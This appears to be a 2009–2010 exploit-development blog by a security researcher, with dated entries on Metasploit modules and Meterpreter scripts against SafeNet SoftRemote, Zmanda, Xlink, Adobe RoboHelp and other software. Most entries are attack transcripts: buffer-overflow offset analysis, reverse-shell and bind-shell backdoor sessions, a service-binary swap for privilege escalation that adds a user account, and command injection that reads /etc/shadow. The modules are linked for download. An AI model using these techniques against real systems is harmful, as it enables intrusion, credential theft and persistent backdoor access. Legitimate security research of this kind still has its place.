02/03/10 - back from the dead (vulns.)

ORACLE create database link Buffer Overflow.

wasn't even aware of the bug until a vulnerablity scanner pointed it out. old bug, new twist. demo for SAHA.

11/04/09 - SafeNet SoftRemote Local Stack Overflow.

SafeNet SoftRemote .spd (policy) files.

cool bug. since the app. is oem'd and used by both juniper and netgear you can understand the impact. passing an overly long string to the "GROUPNAME" argument gets you here: 0:000> k ChildEBP RetAddr WARNING: Stack unwind information not available. Following frames may be wrong. 0012b628 0040b5e3 kernel32!lstrcpyA+0x18 00000000 00000000 spdedit+0xb5e3 0:000> !exchain 0012b618: kernel32!ValidateLocale+2b0 (7c839ac0) 0012b6cc: 41386341 Invalid exception stack at 37634136 0:000> !pattern_offset 20024 0x41386341 [Byakugan] Control of 0x41386341 at offset 84. 0:000> !pattern_offset 20024 0x37634136 [Byakugan] Control of 0x37634136 at offset 80. pretty straight forward. a quick patch for the vuln. and we get here: msf exploit(handler) > rexploit [*] Starting the payload handler... [*] Started reverse handler [*] Sending stage (719360 bytes) [*] Meterpreter session 1 opened (172.10.1.100:1975 -> 172.10.1.104:1049) meterpreter > run whereami [*] All up in the process space of 'SPDEdit.Exe'! meterpreter > pwd C:\Program Files\NETGEAR\NETGEAR ProSafe VPN Client meterpreter >

11/01/09 - Priv. Escalation.

meterpreter fun exploiting folder permissions.

a couple of post by Francis Provencher looked like a fun to incorporate as some meterpreter scripts. let's get our meterpreter session as an unpriv user going... meterpreter > getuid Server username: XPSPPRO\mc meterpreter > shell Process 472 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\>net user test test /add net user test test /add System error 5 has occurred. Access is denied. C:\>exit meterpreter > as expected, we shouldn't be able to do that! so let's obtain the privs to do so. meterpreter > run myremotefileserver_mserver -h [*] My Remote File Server Build 2.4.1 privilege escalation. OPTIONS: -h This help menu -p The port on the remote host where Metasploit is listening -r The IP of the system running Metasploit listening for the connect back [-] Error in script: unexpected return meterpreter > run myremotefileserver_mserver -p 8787 [*] Moving to the appropiate directory... [*] Creating a copy of mserver.exe (mserver_back.exe)... [*] Sending EXE payload 'C:\Program Files\My Remote Files\mserver.exe'. [*] Done, now just wait for the callback... meterpreter > exit [*] Meterpreter session 1 closed. msf exploit(handler) > [*] Command shell session 2 opened (172.10.1.100:8787 -> 172.10.1.104:1025) msf exploit(handler) > sessions -i 2 [*] Starting interaction with 2... Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>net user test test /add net user test test /add The command completed successfully. fun! some issues with these types of bugs are that unpriv users don't have the ability to start/stop/restart the service. so a reboot will need to occur.

10/23/09 - Exploit Packs

Comming Soon.

most likely in the form of metasploit modules ;)

10/23/09 - CVE-2009-3102

Zmanda Recovery Manager for MySQL socket-server.pl command execution.

now, im all for running an automated tool to help discover vulns, but when you have nothing to back up the results than what? for example: $ sudo nasl -t 172.10.1.103 zrm_mysql_binpath_cmd_exec.nasl zrm_mysql_binpath_cmd_exec.nasl: Success as expected. now to take advantage of it. msf auxiliary(zmanda_dohotcopy) > set CMD grep root /etc/shadow CMD => grep root /etc/shadow msf auxiliary(zmanda_dohotcopy) > run [*] Sending command 'grep root /etc/shadow'... [*] Received... root:**edited**.:14318:0:99999:7::: [*] Auxiliary module execution completed msf auxiliary(zmanda_dohotcopy) > trivial example, but writing an exploit to help validate the issues is probably important.

10/05/09 - meterpreter scripting

meterpreter script for windows/shell_bind_tcp

meterpreter scripting helps _alot_. and the ability to build payloads dynamically from your script is just cool. for example: msf exploit(xlink_client) > [*] Started bind handler [*] Server started. [*] Sending Xlink FTP Client Buffer Overflow... [*] Sending stage (719360 bytes) [*] Meterpreter session 2 opened (172.10.0.206:56137 -> 172.10.0.221:9233) msf exploit(xlink_client) > sessions -i 2 [*] Starting interaction with 2... meterpreter > pwd C:\Program Files\OmniNFSe

at our meterpreter prompt. just invoke the script like so: meterpreter > run msf_bind [*] Uploads a windows/bind_shell_tcp backdoor and executes it. Usage: run msf_bind -p OPTIONS: -p LPORT for windows/shell_bind_tcp. meterpreter > run msf_bind -p 1975 [*] Sending EXE payload 'VDBASAJY.exe' [*] Done uploading 'VDBASAJY.exe', executing a windows/shell_bind_tcp port on '1975'... meterpreter > Background session 2? [y/N]

once we get back to the console, use the connect command to access your alternate shell. msf exploit(xlink_client) > connect 172.10.0.221 1975 [*] Connected to 172.10.0.221:1975 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Program Files\OmniNFSe>

the script is here. this will soon be incorprated into meterpreter exploit scripts that take advantage of dacl vulnerabilities.

10/03/09 - CVE-2009-3068

Adobe RoboHelp Server Arbitrary File Upload and Execute Vulnerability.

my initial coverage for this vulnerablity was written as an auxiliary module. for anyone not knowing the difference between aux and exploit modules, auxiliary modules do everything but include the usage of any 'payload'.

the aux module combined information from the intevydis blog entry and a hacked up version of cmd.jsp.

in order to use the module, you will need to stick it into the appropiate name space of your msf trunk.

msf > use auxiliary/admin/http/adobe_robohelper_authbypass msf auxiliary(adobe_robohelper_authbypass) >

once you have it loaded, just point and shoot. keep in mind, for some of the commands passed to the CMD variable, you will need to call them like so: CMD="cmd /c ...."

msf auxiliary(adobe_robohelper_authbypass) > set RHOST 172.10.1.109 RHOST => 172.10.1.109 msf auxiliary(adobe_robohelper_authbypass) > set CMD "cmd /c net localgroup administrators" CMD => cmd /c net localgroup administrators msf auxiliary(adobe_robohelper_authbypass) > run [*] Sending our POST request... [*] Got sessionid of '4517981', sending our second request to 'CCGCFOUP.jsp' with command 'cmd /c net localgroup administrators'... [*] Got: Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator mc The command completed successfully. [*] Auxiliary module execution completed

you can get this module here. but a much cooler exploit module which uses a jsp reverse-shell can be found in the current svn.

10/01/09 - New look!

Just gettting things up and running again.

links